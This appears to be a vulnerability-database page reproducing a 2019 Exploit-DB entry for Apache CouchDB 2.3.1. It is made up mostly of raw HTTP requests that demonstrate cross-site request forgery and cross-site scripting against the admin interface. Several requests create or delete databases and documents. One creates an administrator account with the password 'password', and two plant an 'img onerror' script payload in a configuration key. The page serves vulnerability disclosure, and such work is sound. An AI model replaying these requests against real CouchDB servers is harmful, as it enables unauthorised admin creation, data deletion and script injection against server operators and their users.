Apache CouchDB 2.3.1 | Cross-Site Request Forgery / Cross-Site Scripting

vendor:

CouchDB

by:

Ozer Goker

8.8

CVSS

HIGH

CSRF | XSS DOM Based & Reflected & Stored

352, 79, 89

CWE

Product Name: CouchDB

Affected Version From: 2.3.1

Affected Version To: 2.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:apache:couchdb:2.3.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows, Linux, Mac

2019

Apache CouchDB 2.3.1 | Cross-Site Request Forgery / Cross-Site Scripting

A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (add, edit, delete) database documents.

Mitigation:

Implementing a strong access control mechanism, disabling the HTTP PUT method, and using advanced web application firewall can provide a partial mitigation for this vulnerability.

Source

Exploit-DB raw data:

##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored

#################################################################################

CSRF1

Create Database

PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"id":"test","name":"test"}

#################################################################################

CSRF2

Delete Database

DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################

CSRF3

Create Document

POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"testdoc":"test"}

#################################################################################

CSRF4

Create Admin

PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"password"


#################################################################################


CSRF5 & XSS1 | DOM Based & Stored - Add Option


PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"test"

#################################################################################

CSRF6 & XSS2 | DOM Based & Stored - Delete Option

DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################